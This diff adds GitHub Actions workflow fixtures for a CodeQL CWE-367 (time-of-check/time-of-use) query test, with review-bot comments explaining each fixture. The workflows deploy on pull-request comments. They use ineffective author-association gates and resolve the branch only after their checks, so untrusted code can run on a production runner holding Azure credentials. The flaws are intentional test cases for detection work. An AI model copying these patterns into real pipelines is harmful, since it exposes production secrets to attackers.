@@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml new file mode 100644 index 00000000000..6f03a0e966a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml 
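Review bot: This fixture has no header saying what it is meant to prove, unlike deployment2.yml and test0.yml, which cite their origin. It appears to be the guarded counterpart of test4.yml: both gate on `author_association`, but only this one compares `pushed_at` with `COMMENT_AT` before checking out `head_sha`. A leading comment such as `# association check + comment-vs-push date check: expected no TOCTOU alert` here, and the inverse on test4.yml, would document the pair. The exact wording needs checking against the .expected files, which are not visible in this part of the patch.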
@@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo 
"env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all 
--force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml new file mode 100644 index 00000000000..0be96a4140e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml 
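Review bot: The push-time comparison runs in `security-checks`, but the checkout happens later in `deploy` with `ref: ${{ steps.comment-branch.outputs.head_ref }}`, a branch name that is resolved only when that job runs. A push that lands between the two jobs is therefore still what gets checked out, so the date check does not close the window here; test3.yml repeats the pattern in `docker-environment-creation` and `kickoff-pipeline`. Please add a header comment saying whether the fixture is expected to alert and why, since nothing in the file states it. Separately, the `if:` reads `github.event.pull_request.author_association`, which is not part of an `issue_comment` payload, so those four `!=` comparisons are always true.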
@@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ 
secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + 
kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit 
pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force 
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml new file mode 100644 index 00000000000..9444ad0b627 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml 
@@ -0,0 +1,89 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml new file mode 100644 index 00000000000..e3e557cc511 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml 
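Review bot: The job-level `if:` on `deploy` tests `github.event.issue.author_association`, which describes the pull request's author rather than the account that posted the `/deploy` or `/rollback` comment, and `Get environment from comment` resolves `head_sha` through `gh api` only after the job has started. Whatever the branch head is at that moment is what `Checkout PR branch` fetches and what `./.github/actions/setup-env` then runs with `secrets.AZURE_CREDENTIALS` on the `[self-hosted, production]` runner, so the label and keyword checks are not tied to a reviewed commit. Because this file is a CWE-367 query fixture and the `.expected` file lists its last step as a result, the gap looks intentional. It is not documented in the file, though. A trailing comment such as `# Fixture: gate checks the PR author and head_sha is resolved at run time; the local action after checkout is the expected alert` would record it, and placing it at the end keeps the line numbers in the `.expected` files valid.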
@@ -0,0 +1,209 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ 
steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: 
slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml new file mode 100644 index 00000000000..4a6d1452af2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml 
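Review bot: In `security-checks`, the four `github.event.pull_request.author_association != '...'` comparisons cannot reject anything on this trigger. An `issue_comment` payload exposes the PR link as `github.event.issue.pull_request` and has no top-level `pull_request` object, so the property is empty and every `!=` is true. The commenter's association is available as `github.event.comment.author_association`, so an effective gate would read along the lines of `contains(fromJSON('["OWNER","MEMBER","COLLABORATOR"]'), github.event.comment.author_association)`. Separately, in `deploy` the `Checkout PR branch` step uses `ref: ${{ steps.comment-branch.outputs.head_ref }}`, a branch name, while both status steps report against `head_sha`, so the code that runs and the commit that receives the status can differ. If the ineffective gate is part of what this CWE-367 fixture models, a comment at the end of the file saying so would keep a later maintainer from "fixing" it and silently changing the expected results.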
